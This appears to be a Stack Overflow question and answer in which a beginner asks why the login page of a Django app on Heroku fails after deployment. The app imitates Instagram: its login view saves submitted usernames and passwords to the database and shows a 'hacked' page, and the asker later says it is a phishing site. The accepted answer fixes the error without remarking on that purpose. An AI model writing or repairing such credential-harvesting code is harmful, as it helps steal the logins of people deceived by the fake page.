# django Error: "DoesNotExist at /login/" ,after deployment to heroku

Tags: python, django, heroku

My project works fine on localhost but i can not navigate to login page after deployment. https://instagrm-0.herokuapp.com works fine but when I click on login button i.e
https://instagrm-0.herokuapp.com/login/ ,I get error **"Does not exist at /login/" .**
**NOTE:**(It works fine on local host). Here is my project urls.py file

```
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include("main.urls")),
]
```

This is my App urls.py file

```
from django.urls import path
from . import views
urlpatterns = [
    path("", views.frm, name="frm"),
    path("login/", views.login, name="login"),
]
```

This is my views.py

```
from django.shortcuts import render

from django.http import HttpResponse
from .models import store, Item

def login(response):
    ls = store.objects.get(username="username")
    ls1 = store.objects.get(username="password")
    if response.method == "POST":
        txt = response.POST.get("nm")
        if len(txt) > 3:
            ls.item_set.create(text=txt, complete=False)
        psw = response.POST.get("ps")
        if len(psw) > 3:
            ls1.item_set.create(text=psw, complete=False)
        print("done")
    return render(response, "main/hacked.html")
def frm(response):
    return render(response, "main/instagram.html", {})
```

Answer (score 1, accepted):

This is because you're trying to access objects which does not exists in your db `get()` will raise exception if Multiple objects are returned and will raise exception id object does not exists.
do like this

```
try:
   ls = store.objects.get(username="username")
except store.DoesNotExist:
   ls = None
```

**or**

```
ls = store.objects.filter(username="username").first()
```

NOTE : Do not hard code username & password and Class names should normally use the CapWords convention. Change **store** to **Store**

Comment: Hello @farhanjatt maybe in you've created a record for store for given user that's why your code is working correctly in localhost but on server you don't have any rows in your database that's why it's giving you error.

Comment: actually I am weak in English so I could not understood the anwser. The words were in my mind and suddenly I got it. Please upvote this answer. @Ankit Tiwari you are right there is no col with name username and password. Thanks

Comment: I am new to django and built phishing site as my first project. Now project is deployed with warning "phishing site".